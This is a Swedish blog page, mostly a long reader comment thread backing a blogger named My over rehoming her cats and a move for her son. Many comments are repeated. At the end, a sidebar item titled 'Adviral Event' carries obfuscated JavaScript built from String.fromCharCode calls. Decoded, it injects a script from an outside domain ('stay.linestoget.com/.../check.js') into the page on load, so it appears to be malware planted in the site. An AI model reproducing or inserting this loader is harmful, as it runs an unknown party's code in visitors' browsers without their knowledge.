  Du är du. Du är mamma och jag ser att du ger ALLT som förälder. Du trixar, vrider å vänder på ditt liv. Allt för dina lilla son. Jag högaktar dig för det. Gör det som är bäst för dig och din lilla familj. Skit i vad folk tycker. Du anar inte vilken självuppoffrande mamma du är. Du e så fantastisk.
  Kramar i massor.
  //Madde

 38. Jisses! Vad är det som gör att människor hela tiden ska ”gotta” sej i andra?? Vad sitter det i? Visst kan man prata om andra människor, men varför måste det vara så elakt? ”Undrar hur den har råd med det,och den måste ju vara dum som gör si och så..” osv! Myntet har alltid två sidor och det finns troligen en anledning till beslut. Det som kan verka tokigt i andras ögon kan ju ändå vara ett självklart val i dina ögon. Man ska ju såklart inte bry sej, men ibland är det svårt att inte ta åt sej.
  Ja ja, må så gott My och va rädd om dej! Du kommer att ha mycket att tänka tillbaka på när du blir gammal;) till skillnad från tråkmånsarna som kommenterar och som troligen har dödstråkigt i sina liv😉 Kram💜💜

 39. Det är kanon att du säger ifrån. Dock ska du inte behöva förklara allt. Men håller med om att en del läsare är pantade. 🙈 Kanske My, måste man själv ha spelat dragspel å fö’låt KK för att förstå. Du verkar vara en underbar kvinna, jättefin mamma. Massor av kramar, men du: var rädd om dig❤️ Finns bara en My❤️

 40. Hej My!
  vilket inlägg du har skrivit. Du är en stark kvinna och skit i vad folk tycker och anser. Låt dem ha sina problem. Du är värd så så mkt mer. Det är modigt att berätta som du gör, du visar vilken kvinna DU är. Du kan så mkt mer än vad många andra kan. Glöm inte bort att just DU är värdefull och sträck på dig och var stolt över dig och vad du har och kan. Ta hand om dig 😘.

  Kram Tina

 41. Har långt ifrån tyckt att du gjort rätt osv i diverse olika saker innan MEN nu måste jag ge dig en eloge för din kämparanda 💪👏💪👏Alla dessa motgångar och människor emot dig! Inte rättvist alls och jag tycker genuint synd om dig! Vet själv att man inte orkar hur mkt som helst och att du står på benen är otroligt faktiskt! Tyckte själv att det var märkligt att skaffa katter osv med tanke på hur du flänger… men såklart kan saker ändra sig och precis som du säger så blir ett nytt hem bättre för dem! Vad gäller lilleman har du gjort HELT RÄTT! Han har rätt till hela sin familj ❤️ Och när skolan börjar blir klasskompisar mer och mer viktiga och så lite aktiviteter på det..Då är det svårt att få barn till att byta ort titt som tätt om du ex skulle haft honom bara på helger.. Så för honom blir det bäst! Kul för dig att du hittat kärleken – det är du värd! ❤️ Hälsn Malin

 42. Okej My.
  I dag börjar jag med en stor kram.
  Två anledningar.
  Den första är den där djävla cancern.
  Förlorade min sambo för några år sedan till elendet. Det gick fort för hon valde att avsluta det hela själv.
  Den andra är dessa djävla nättroll.
  Att dom vara orkar fegisar.
  En idiot kan se att dina katter mår bra och att du gör allt för deras bästa.
  Ludvig är som en solstråle hela tiden och med Jonas är ni båda verkligen lyckliga.
  Jag blev glad att du röt ifrån.
  Du är en fantastisk människa så bara fortsätt som du gör. Allt kommer att bli toppen
  Oj blev lite långt men ibland så rinner ordflödet på.
  Kram L

 43. Jag blir mållös! Det är fruktansvärt att du ska behöva försvara dig på detta sättet. Det är ju ingen annan än DU som vet vad som är bäst för dig, din son och djur. Varför ens läsa din blogg om man uppenbarligen inte gillar dig? Hade man gillar dig hade man ju inte hållit på såhär. Suck.

  Ta hand om dig. Ta inte åt dig av all slut som skrivs. Du vet vad som är bäst för dig. Kram

 44. Varför fortsätter du att godkänna dessa kommentarer, det är väl ändå du som beslutar vilka som ska visas. Vet att du har tagit upp detta många gånger tidigare, så låt de vara ta bara bort de så slipper du det här och alla som hänger på, åsikter ok men elakheter nej ta bort.

   • Vore det inte bättre att svara dessa sms brev och mail direkt det borde väl ta och något de säker inte räknar med, ifall du nu inte gör det redan förstås. STORA bokstäver som svar på en fråga behövs inte.

    • Stora bokstäver kom in, av misstag. Såg inte förrän nu. Nej, jag tycker att man bör lyfta ämnet när det går för långt…. viktigt framförallt för dom yngre att visa att detta inte är Okay

 45. Hej My!
  Du är helt fantastisk, vad du kämpar.
  Jag hoppas verkligen att det ska gå bra för dig. Har följt dig länge ,har köpt blommor av dig, har en orkidé som jag köpte för ca 3 år sen som har blommat varje dag sedan dess !Nu hoppas jag att det bara ska gå framåt. Lycka till! Kram ❤

 46. Tänk om alla tänkte och gjorde som dig My. Du är en fantastisk mamma, djurvän etc. Dessa idioter som sitter och vräker ur sig gör mig så förbannad. Sålla bort, slå dövörat till och lev ditt liv precis så som DU vill. Idioter finns det gott om, men vi är många fler vid din sida som stöttar dig! Stor kram

 47. All heder åt dig som tänker först och främst på din son och dina djur❤❤❤❤ tyvärr så gör inte alla det och det är mycket tydligt när man läser de otroligt korkade uttalanden som vissa ”troll” vräker ur sig…..

 48. Att dom orkar. Dom kan inte ha det lätt med så mycket fritid så att dom har så mycket tid över att svinga dynga till höger och vänster.
  Alla gör fel beslut ibland, för det är man ingen sämre människa.
  Du är stark nu My! Du har en fin son och man vid din sida. Strunta i pöbeln och va lycklig! Det är du värd ❤

 49. Fina My. Skickar massor med kramar genom cybervärlden.💞 det är bara du som kan leva ditt liv. Vi andra får leva våra egna liv.😊 sköt om dig nu och din lille vapendragare😘

 50. Ingen har rätt att ifrågasätta dig, du vet vad som är bäst för din familj(inklusive katter och hundar). Alla läskunniga och vettiga människor vet att du är en fantastisk människa precis som du är! ?Allt kommer att ordna sig till det bästa för er alla??KRAM

 51. Hej My.
  Tycker du är oerhört klok och mogen i dina beslut med allt vad som händer i ditt liv. Du är fantastisk tycker jag som roddar runt allt på bästa sätt. Och som sagt det bästa för dig och din son här och nu. Bara du kan veta vad som är det rätta beslutet för er. Du är oegostisk som alltid tänker på alla runtom dig först. Hoppas verkligen du får massa kärlek och lycka omkring dig. Det är du verkligen värd.
  Och fy skäms på er alla besserwisser som har så mycket åsikter hur My ska göra. Stötta henne istället och visa henne respekt istället.
  Stor Kram på dig Nu och fortsätt tro på att du gör det bästa för dig och din familj
  Pernilla från Täby

 52. Ville bara titta in och säga att det är tragiskt att du måste förklara för folk varför du gör si eller så. Och att dessutom få kritik i svåra val/situationer. 😟 Vad är det som händer m mänskligheten?
  Ditt liv, dina val!
  Tro på dig själv, kram! 💕

 53. Oj vilket inlägg, kan riktigt känna hur det kokade i dig när du skrev det.
  Du är en sann djurvän o kissarna ser så fina o välskötta ut. Fatttar inte varför folk ska döma så. Hade det varit pga allergi du behövt omplacera så hade det inte blivit sånt rabalder. O livssituationen kan ju ändras för vem som helst liksom…. Jag tänker på hur många djurägare det finns som tyvärr inte tar tag i o omplacerar sitt djur när levnadsförhållanden ändras utan istället låter det/dem leva i misär. Har sett mycket sånt bla genom mitt jobb. Sådant gör mig mer än förbannad.
  Så du tar ju bara ditt ansvar, även om det inte var så du hade tänkt dig från början. Hoppas du hittar det bästa hemmet som kommer ge dem massor av kärlek😊

  • Ja Pernilla… du har helt rätt… jag älskar mina kissar <3 SÅÅÅÅ mycket!!!! jag knake har en kombinerad lösning… v i testar just nu. Jag önskar verkligen att det ska fungera! TACK! kram <3

 54. Men snälla söta My!
  Jag har iaf aldrig ifrågasatt dina val, jag håller på dig oavsett!
  Jag förstår att det är känslomässsigt tungt nu..
  Guud vad jag hoppas på dig och att du klarar allt med bravur!

 55. Du är säkert en jättefin människa och det har väl inte undgått nån att du varit genom ett helvete och behövt växa upp väldigt tidigt. Men ändå… du visste väl för fasiken att sonen skulle börja i skolan? Trodde du på fullaste allvar att han pappa bara skulle nöja sig med att träffa honom på helger? Och mitt i detta skaffa TVÅ katter? Och plugga till PT? För att nu börja plugga till nått annat? Mycket verkar du ha men förmågan att ta genomtänkta beslut? Nja.

  • Söta rara Lilla Malin. Ludvig skulle börjat skolan i Sigtuna, förutsättningarna förändrades. Har budkapet gått fram till dig? Ska jag skriva med stora bokstäver, vill du komma hem hit till Täby och diskutera saken, kika på papper, överenskommelser och dialoger som förekommit. Välkommen!

  • Till Malin!

   O här har vi en ”Malin” som förmodligen bor på Öland. Hur visste du att barnet skulle börja skolan? Förmodligen för att du känner familjen, det är ju uppenbart med tanke på hur du skriver.
   Nu är det så här Malin. Rent juridiskt har inte en pappa ägande rätt till hur en situation ska se ut när man har ett gemensamt barn, ni är många som tycks tro att det är pappan som ägt avgörandet i sin hand. Så är det inte! Mamman har EXAKT lika stor rätt som en pappa att säga sitt om livssituationen för ett gemensamt barn. Jag är fullständigt övertygad om att My hade vunnit i en domstolsförhandling o utslaget hade säkerligen blivit att barnet har rätt att gå i en skola hos mamman där hon väljer att bo, där hon har sin försörjning. Mamman hade haft en klar fördel i förhållande till pappan eftersom hon bara har 1 barn, och pappan har flertal barn.

   My har sitt jobb o sin framtid i Stockholm, en domstol hade aldrig kunnat säga till My att hon måste sänka sina ekonomiska krav och ta ett ”vanligt jobb” nere i Småland. Ingen domstol äger rätten att bestämma över människors inkomst eller var de ska bosätta sig.

   My valde själv att ta ett EGET beslut att låta sonen gå i skolan här för att kunna ha sitt syskon i samma skola, det har hon ju själv skrivit om här.

   Så håll käften på er idioter som sitter och skriver här o har åsikter om saker ni inte vet ett skit om. Ska jag berätta om varför ni sitter här o skriver skit, jo för att ni lider av den obotliga sjukan som kallas ”AVUNDSJUKA”. Ryck upp er och gå o kamma till er lite istället!

 56. Jag lever ett totalt annat liv än ditt, jag har frågor ibland o svårt att förstå vissa av dina val men jag har alltid försökt att ställa sakliga frågor i förhoppning att jag ska få bättre insikt o därmed förståelse. Jag blir så innerligt ledsen för din skull att du får så mycket skit som du säger!! Bloggen borde vara fylld med pepp o heja-rop, vara ett glädjepiller o en plats för dig att också få energi! Bort med alla haters o låt värme, glädje o gemenskap vara ledorden på din blogg! Lycka till med allt o jag ser fram emot att följa din höst o din framtid!

 57. Åååå den sista idioten är ju inte född. Att det finns personer som fortsätter att skicka elakheter, hot etc till offentliga personer som de inte känner personligen, och dessutom gömmer sig bakom alias. Ja alltså det går ju knappt att bli förbannad, de här personerna kan inte bättre än så här…tyvärr..annars hade de inte trakasserat T ex dig. Nä, det är ditt liv, dina val som du så generöst delar med dig av. Och livet blir ju inte alltid som planerat. Jag tycker du är klok och tänker verkligen på din sons bästa och på dina djurs bästa. Lev ditt liv och gör det som just du känner för. Stor kram.

 58. Först vill jag skicka en stor cyberkram till dig ❤️ Du sätter ju katterna, Ludvig o Tess i första hand, det kan ju ingen säga emot ❤️ Så himla dumt att komma med taskiga kommentarer när du redan mår dåligt av att omplacera dom ?
  Kram ❤️

 59. Hej! Jag följer en del bloggar och brukar inte kommentera men kan inte låta bli. Livet förändras och går upp och ner och vi möter motgångar, hur man hanterar och möter dem definierar dig och formar dig och oss alla till förhoppningsvis mera insiktsfulla personer. Att ta dessa svåra beslut tyder bara på att du stark, att du sätter ditt barn främst är osjälviskt, det är så många som glömmer bort barnen i tvister och bara fokuserar på sitt egna behov.
  Att du ändå drömmer och vill något mer är inte fel, vi har bara ett liv och vi ska inte sluta leva eller ta vara på möjligheterna men du var rädd om dig, bränn inte ut dig!

  // Carina

  • Tack Carina 🙏🏻 Jag uppskattar verklige det du skriver….. från hjärtat ❤️ Jag föröker att inte ”tappa mig själv” 🙏🏻❤️ Kram

 60. Hej My!

  Ge inte dessa troll någon uppmärksamhet. Det är ditt liv som ingen annan har med att göra. Du gör det som är bäst för dig och de dina. Ignorera i stället för att mata dem. Du är fantastisk och du ger mig mycket inspiration trots att jag är mycket äldre än du. Kom ihåg att du är värdefull. Lev ditt liv som du vill och njut av det.

  Stor kram
  Mua

 61. Hej My!

  Ge inte dessa troll någon uppmärksamhet. Det är ditt liv som ingen annan har med att göra. Du gör det som är bäst för dig och de dina. Ignorera i stället för att mata dem. Du är fantastisk och du ger mig mycket inspiration trots att jag är mycket äldre än du. Kom ihåg att du är värdefull. Lev ditt liv som du vill och njut av det.

  Stor kram
  Mia

 62. Kämpa på My! Många av de som kommenterar negativt skulle troligtvis inte kunna åstadkomma hälften av de du gör i ditt liv. Du är en förebild som stark och driftig kvinna för din son. Du ska vara stolt. All styrka till dig!

 63. Jag blir så trött av att ni bloggare ska behöva förklara er hela tiden. Det är väl bara att sluta läsa och följa bloggen om den inte passar dig.
  Fortsätt vara du ❤

 64. Väl skrivet My! Det är inga lätta beslut du har tvingats att ta, men det kommer att bli bra för det måste bli bra! Det är du som lever i situationen och ser vad du måste göra, självklart gör du allt som står i din makt för Lilleman och dina älskade djur!
  Håll ut, snart landar du och kan börja andas lite lugnare igen, under tiden får du hämta kraft hos oss här!❤️
  En mycket kär vän som kämpar med tuffa behandlingar brukar säga ”She believed she could so she did”, det passar perfekt in på dig.?
  Ta hand om dig, vi är här för dig! Bamsekramar Ullis❤️

 65. My, länge sedan jag kommenterade. Sist var när du kämpade med konkurs osv.
  Du är du. Du är mamma och jag ser att du ger ALLT som förälder. Du trixar, vrider å vänder på ditt liv. Allt för dina lilla son. Jag högaktar dig för det. Gör det som är bäst för dig och din lilla familj. Skit i vad folk tycker. Du anar inte vilken självuppoffrande mamma du är. Du e så fantastisk.
  Kramar i massor.
  //Madde

 66. Varför fortsätter du att godkänna dessa kommentarer, det är väl ändå du som beslutar vilka som ska visas. Vet att du har tagit upp detta många gånger tidigare, så låt de vara ta bara bort de så slipper du det här och alla som hänger på, åsikter ok men elakheter nej ta bort.

   • Vore det inte bättre att svara dessa sms brev och mail direkt det borde väl ta och något de säker inte räknar med, ifall du nu inte gör det redan förstås. STORA bokstäver som svar på en fråga behövs inte.

    • Stora bokstäver kom in, av misstag. Såg inte förrän nu. Nej, jag tycker att man bör lyfta ämnet när det går för långt…. viktigt framförallt för dom yngre att visa att detta inte är Okay

 67. Hej My!
  Du är helt fantastisk, vad du kämpar.
  Jag hoppas verkligen att det ska gå bra för dig. Har följt dig länge ,har köpt blommor av dig, har en orkidé som jag köpte för ca 3 år sen som har blommat varje dag sedan dess !Nu hoppas jag att det bara ska gå framåt. Lycka till! Kram ❤

 68. De klart du skulle vilja ha dina katter kvar!!! Först köper du en och sen en till för du tycker att de ska ha varandra ett tecken på en sann djurvän. Om du måste skiljas från dem så blir nog ett tomrum i hjärtat om jag känner dig rätt. Hoppas de löser sig. Kram ???

 69. När jag läser om vad du har fått gå igenom så blir jag helt slut och trots alla dina motgångar så fortsätter du kämpa och tar vettiga och osjälviska beslut gång på gång! I mina ögon är du en riktig förebild och ska ha all respekt i världen! Jag har följt dig i flera år men är usel på och kommentera men du ska veta att jag tycker du gör helt rätt när det gäller din hund och dina katter. Sen att du väljer att flytta till Öland för din son skull trots allt du har fått utstå visar bara på att du är en FANTASTISK mamma och jag önskar dig all lycka i världen. Sen är jag extra glad att du träffat Jonas som verkar vara en riktigt fin man som vet hur man tar hand om sin tjej ? Kram på dig fina My ❤️

 70. Ingen har rätt att ifrågasätta dig, du vet vad som är bäst för din familj(inklusive katter och hundar). Alla läskunniga och vettiga människor vet att du är en fantastisk människa precis som du är! 💜Allt kommer att ordna sig till det bästa för er alla🌿👍KRAM

 71. Lyssna inte på dom där pissråttorna. Du har fått lite vind i seglen o det sticker tydligen i ögonen på somliga. Det du gör för dina djur o Ludvig är för att ALLA ni ska få ett så bra liv som möjligt o ingen ska bli åsidosatt. Nä My jag tror merparten av oss härinne applåderar dina val o att du kan få lite ordning o lugn o ro kring allt. Snap Snap and you go girl, we got your back???Stor kram Jeanette

 72. Men snälla söta My!
  Jag har iaf aldrig ifrågasatt dina val, jag håller på dig oavsett!
  Jag förstår att det är känslomässsigt tungt nu..
  Guud vad jag hoppas på dig och att du klarar allt med bravur!

 73. Åååå den sista idioten är ju inte född. Att det finns personer som fortsätter att skicka elakheter, hot etc till offentliga personer som de inte känner personligen, och dessutom gömmer sig bakom alias. Ja alltså det går ju knappt att bli förbannad, de här personerna kan inte bättre än så här…tyvärr..annars hade de inte trakasserat T ex dig. Nä, det är ditt liv, dina val som du så generöst delar med dig av. Och livet blir ju inte alltid som planerat. Jag tycker du är klok och tänker verkligen på din sons bästa och på dina djurs bästa. Lev ditt liv och gör det som just du känner för. Stor kram.

 74. Först vill jag skicka en stor cyberkram till dig ❤️ Du sätter ju katterna, Ludvig o Tess i första hand, det kan ju ingen säga emot ❤️ Så himla dumt att komma med taskiga kommentarer när du redan mår dåligt av att omplacera dom 😞
  Kram ❤️

 75. Väl skrivet My! Det är inga lätta beslut du har tvingats att ta, men det kommer att bli bra för det måste bli bra! Det är du som lever i situationen och ser vad du måste göra, självklart gör du allt som står i din makt för Lilleman och dina älskade djur!
  Håll ut, snart landar du och kan börja andas lite lugnare igen, under tiden får du hämta kraft hos oss här!❤️
  En mycket kär vän som kämpar med tuffa behandlingar brukar säga ”She believed she could so she did”, det passar perfekt in på dig.😊
  Ta hand om dig, vi är här för dig! Bamsekramar Ullis❤️

 76. Nu blir jag så där förbannad, här delar du med dig av ditt liv på ett sätt du inte alls behöver eller som många andra inte gör och det kan vi bara vara tacksamma över. Men uppenbarligen så måste vissa satt dig på piedistal som dömer dig då du måste göra dig av med katterna och dina livsval, annars skulle de ju inte bli så besvikna att de måste skriva något elakt? Jag undrar finns det någon som läser som inte fått sitt liv förändrat? Jag förstår att du tänkte att du skriver här om katterna för då vet du vem som svarar osv. tyvärr så tänkte jag i går då jag läste det att faaan, hon skulle lagt ut en annons på blocket i stället som så många andra gör för detta kan hon komma att få skit för.. och jag är så ledsen att jag hade rätt i mina tankar. Jag är så glad för din skull att du förutom Lilleman har en vuxen man som stöttar dig i dina beslut och att han kan ge dig en kram då du börjar förlora tron på både dig själv och vissa bloggläsare. Skickar också en kram, jag har aldeles för många kattallergiker i min närhet annars skulle jag komma ner och köpa av dig Stina och Sture… MEN nu insåg jag att inte ens jag som är näst intill perfekt ? ha ha ho ho eller inte? kan kasta den första stenen på dig, jag hade katt som jag gav bort pga. att MITT liv, inte ens kattstackarns liv blev lidande för min dåvarande kille och flera andra vänner hade allergi visade det sig.. Ja sån är jag. Men den katten lever fortfarande hos mina gamla grannar på landet och fångar råttor o har det bra och kommer inte alls i håg mig då jag kommer och hälsar på… Fasen, katter verkar hämta sig utan att få bestående men.. <3

 77. De klart du skulle vilja ha dina katter kvar!!! Först köper du en och sen en till för du tycker att de ska ha varandra ett tecken på en sann djurvän. Om du måste skiljas från dem så blir nog ett tomrum i hjärtat om jag känner dig rätt. Hoppas de löser sig. Kram 💖💟💖

 78. När jag läser om vad du har fått gå igenom så blir jag helt slut och trots alla dina motgångar så fortsätter du kämpa och tar vettiga och osjälviska beslut gång på gång! I mina ögon är du en riktig förebild och ska ha all respekt i världen! Jag har följt dig i flera år men är usel på och kommentera men du ska veta att jag tycker du gör helt rätt när det gäller din hund och dina katter. Sen att du väljer att flytta till Öland för din son skull trots allt du har fått utstå visar bara på att du är en FANTASTISK mamma och jag önskar dig all lycka i världen. Sen är jag extra glad att du träffat Jonas som verkar vara en riktigt fin man som vet hur man tar hand om sin tjej 😉 Kram på dig fina My ❤️

 79. Lyssna inte på dom där pissråttorna. Du har fått lite vind i seglen o det sticker tydligen i ögonen på somliga. Det du gör för dina djur o Ludvig är för att ALLA ni ska få ett så bra liv som möjligt o ingen ska bli åsidosatt. Nä My jag tror merparten av oss härinne applåderar dina val o att du kan få lite ordning o lugn o ro kring allt. Snap Snap and you go girl, we got your back😋😊😍Stor kram Jeanette

 80. Nu blir jag så där förbannad, här delar du med dig av ditt liv på ett sätt du inte alls behöver eller som många andra inte gör och det kan vi bara vara tacksamma över. Men uppenbarligen så måste vissa satt dig på piedistal som dömer dig då du måste göra dig av med katterna och dina livsval, annars skulle de ju inte bli så besvikna att de måste skriva något elakt? Jag undrar finns det någon som läser som inte fått sitt liv förändrat? Jag förstår att du tänkte att du skriver här om katterna för då vet du vem som svarar osv. tyvärr så tänkte jag i går då jag läste det att faaan, hon skulle lagt ut en annons på blocket i stället som så många andra gör för detta kan hon komma att få skit för.. och jag är så ledsen att jag hade rätt i mina tankar. Jag är så glad för din skull att du förutom Lilleman har en vuxen man som stöttar dig i dina beslut och att han kan ge dig en kram då du börjar förlora tron på både dig själv och vissa bloggläsare. Skickar också en kram, jag har aldeles för många kattallergiker i min närhet annars skulle jag komma ner och köpa av dig Stina och Sture… MEN nu insåg jag att inte ens jag som är näst intill perfekt 😉 ha ha ho ho eller inte? kan kasta den första stenen på dig, jag hade katt som jag gav bort pga. att MITT liv, inte ens kattstackarns liv blev lidande för min dåvarande kille och flera andra vänner hade allergi visade det sig.. Ja sån är jag. Men den katten lever fortfarande hos mina gamla grannar på landet och fångar råttor o har det bra och kommer inte alls i håg mig då jag kommer och hälsar på… Fasen, katter verkar hämta sig utan att få bestående men.. <3

 81. Att folk bara orkar skiva en massa elakheter.
  Vad får de ut av det ?
  De mår väl knappast bättre själva av det i alla fall.
  Du är en fantastisk person( har aldrig träffat dig irl )
  Du har fått kämpa så mycket i motvind så jag hoppas att du nu får en massa medvind.
  Det är du värd
  Var rädd om dig
  Kram <3

 82. Hej My och välkommen till Täby ❤️
  Kommenterar sällan (typ aldrig) men nu måste jag yttra mig. Läser din blogg dagligen och måste bara få säga att du växer i mina ögon, hela tiden. Trodde nog redan från början att du var en toppenkvinna, men du är mer än så! Du visar ju gång på gång att ditt barn går i första hand, hur kan ”trollen” inte se det??
  Fortsätt vara den du är, fantastisk helt enkelt. Allt gott till dig och dina nära ❤️

 83. Att folk bara orkar skiva en massa elakheter.
  Vad får de ut av det ?
  De mår väl knappast bättre själva av det i alla fall.
  Du är en fantastisk person( har aldrig träffat dig irl )
  Du har fått kämpa så mycket i motvind så jag hoppas att du nu får en massa medvind.
  Det är du värd
  Var rädd om dig

  Kram <3

 84. Hej My och välkommen till Täby ❤️
  Kommenterar sällan (typ aldrig) men nu måste jag yttra mig. Läser din blogg dagligen och måste bara få säga att du växer i mina ögon, hela tiden. Trodde nog redan från början att du var en toppenkvinna, men du är mer än så! Du visar ju gång på gång att ditt barn går i första hand, hur kan ”trollen” inte se det??
  Fortsätt vara den du är, fantastisk helt enkelt. Allt gott till dig och dina nära ❤️

 85. Här var så mkt kommentarer att man inte orkar läsa.
  Men när jag läser kommentarerna vid inlägget att du vill placera om dina katter så ser jag inte just nån som är elak eller vidrig?
  Självklart lägger du väl inte ut alla men lägg ut nån ibland så man som läsare kan förstå på vilket sätt människor är elaka.
  Jag håller inte alltid med i allt du (eller andra ) skrivet och vill jag framföra en annan åsikt så gör man det på ett ICKE elakt sätt, för hur skulle det se ut om alla tycker lika?
  Hursomhelst är det svårt förstå allt du skriver om ”nättrollen” när man inte vet vad de skriver.
  Släng ut nån sån elak kommentar du får nån gång så kommer de säkert få svar på tal.
  Lycka till! Med allt

 86. Här var så mkt kommentarer att man inte orkar läsa.
  Men när jag läser kommentarerna vid inlägget att du vill placera om dina katter så ser jag inte just nån som är elak eller vidrig?
  Självklart lägger du väl inte ut alla men lägg ut nån ibland så man som läsare kan förstå på vilket sätt människor är elaka.
  Jag håller inte alltid med i allt du (eller andra ) skrivet och vill jag framföra en annan åsikt så gör man det på ett ICKE elakt sätt, för hur skulle det se ut om alla tycker lika?
  Hursomhelst är det svårt förstå allt du skriver om ”nättrollen” när man inte vet vad de skriver.
  Släng ut nån sån elak kommentar du får nån gång så kommer de säkert få svar på tal.
  Lycka till! Med allt

 87. Hej fina my , jag kan tycka att man ska tänka efter då man skaffar djur osv . Men livet ger oss inget facit på vad som händer osv.
  Så ge bort dem er nog rätt alternativt du har dem varannan vecka å Ludvigs pappa varannan vecka kanske, tänker han må bli ledsen å sakna dem …
  Kram

  • Ja, man ska tänka efter. Det är vad JAG förespråkar också. jag har själv genom min förra butik hjälpt till ideellt med att både omplacera 3 katter, samt ta hand om katter som sökt sig till in föredetta handelsträdgård. Vi har tagit hand om totalt 7 katter och två kullar, Så sanna min ord när jag skriver att jag är en djurvän och framförallt en kattmänniska. Nu förändrades ALLT för mig på samma gång Då är det inte mycket mer än vad jag gjort och fortfarande gör som är några alternativ.. Jag har en bara lösning som v i utvärderar just nu. Ludvigs pappa är inte ett alternativ. Med vänlig hälsning, MY

 88. Hej fina my , jag kan tycka att man ska tänka efter då man skaffar djur osv . Men livet ger oss inget facit på vad som händer osv.
  Så ge bort dem er nog rätt alternativt du har dem varannan vecka å Ludvigs pappa varannan vecka kanske, tänker han må bli ledsen å sakna dem …
  Kram

  • Ja, man ska tänka efter. Det är vad JAG förespråkar också. jag har själv genom min förra butik hjälpt till ideellt med att både omplacera 3 katter, samt ta hand om katter som sökt sig till in föredetta handelsträdgård. Vi har tagit hand om totalt 7 katter och två kullar, Så sanna min ord när jag skriver att jag är en djurvän och framförallt en kattmänniska. Nu förändrades ALLT för mig på samma gång Då är det inte mycket mer än vad jag gjort och fortfarande gör som är några alternativ.. Jag har en bara lösning som v i utvärderar just nu. Ludvigs pappa är inte ett alternativ. Med vänlig hälsning, MY

 89. Hoppas allt löser sig för dig.Kan inte vara lätt att leva som du gör och ändå klara av det så pass bra.Men det blir bättre det kan du vara säker på.Önskar dig allt gott med katter och barn och Jonas

 90. Ja tänkte det, när jag läste ditt förra inlägg, att nu kommer du att få skit för detta, också. Trist att behöva förklara sig hela tiden och trist att vissa anser sig ha rätten att få veta precis ALLT, bara för att du har valt att blogga. Så klart att du blir både arg och ledsen när du försöker göra det som är rätt för er, trots att det gör ont. Vem skulle inte bli det?

 91. Hoppas allt löser sig för dig.Kan inte vara lätt att leva som du gör och ändå klara av det så pass bra.Men det blir bättre det kan du vara säker på.Önskar dig allt gott med katter och barn och Jonas

 92. Ja tänkte det, när jag läste ditt förra inlägg, att nu kommer du att få skit för detta, också. Trist att behöva förklara sig hela tiden och trist att vissa anser sig ha rätten att få veta precis ALLT, bara för att du har valt att blogga. Så klart att du blir både arg och ledsen när du försöker göra det som är rätt för er, trots att det gör ont. Vem skulle inte bli det?

 93. Du är så grymt målmedveten och stark tjej som klarar att ta dessa jobbiga men nödvändiga beslut!!
  Heja dig My!!
  Allt kommer säkert bli bra tillslut❤️
  Tror på dig fina öppenhjärtiga och ärliga My!!
  Lycka till med allt

 94. Du är så grymt målmedveten och stark tjej som klarar att ta dessa jobbiga men nödvändiga beslut!!
  Heja dig My!!
  Allt kommer säkert bli bra tillslut❤️
  Tror på dig fina öppenhjärtiga och ärliga My!!
  Lycka till med allt

 95. I mina ögon är du bara så grym! Jag är så imponerad av det du gjort, hur du som 18 åring startat din egna verksamhet som du lyckades så bra med i många år och hur du gått vidare och kämpat när du sedan kraschat, det är imponerande! Men även alla andra motgångar du stött på som du faktiskt moget och klokt hanterat på vad jag tycker, ett helt rätt sätt. Det som verkar genomsyrar dig som person är att du handlar med hjärtat när det kommer till dom du tycker om. Du sätter ju verkligen både dina djur och din son före dig själv och förmodligen är du sådan som person som säkert bry dig mycket om dina nära och kära. Man kan inte veta hur livets vägar kommer gå så tycker det är helt fel av personer att döma dig, precis som inte vi alla andra har tagit ”dåliga” beslut som vi fått rätta till i efterhand, jag har då minsann gjort det och inte bara en gång utan flertal ggr. Det har vi med sanning gjort! Jag blir riktigt förbannad när jag läser vad folk skriver till dig! Du ska bara skaka av dig deras skit! Du är i mina ögon en stark och klok tjej och en sann djurvän och fantastisk mamma. Jag är imponerad!

 96. I mina ögon är du bara så grym! Jag är så imponerad av det du gjort, hur du som 18 åring startat din egna verksamhet som du lyckades så bra med i många år och hur du gått vidare och kämpat när du sedan kraschat, det är imponerande! Men även alla andra motgångar du stött på som du faktiskt moget och klokt hanterat på vad jag tycker, ett helt rätt sätt. Det som verkar genomsyrar dig som person är att du handlar med hjärtat när det kommer till dom du tycker om. Du sätter ju verkligen både dina djur och din son före dig själv och förmodligen är du sådan som person som säkert bry dig mycket om dina nära och kära. Man kan inte veta hur livets vägar kommer gå så tycker det är helt fel av personer att döma dig, precis som inte vi alla andra har tagit ”dåliga” beslut som vi fått rätta till i efterhand, jag har då minsann gjort det och inte bara en gång utan flertal ggr. Det har vi med sanning gjort! Jag blir riktigt förbannad när jag läser vad folk skriver till dig! Du ska bara skaka av dig deras skit! Du är i mina ögon en stark och klok tjej och en sann djurvän och fantastisk mamma. Jag är imponerad!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,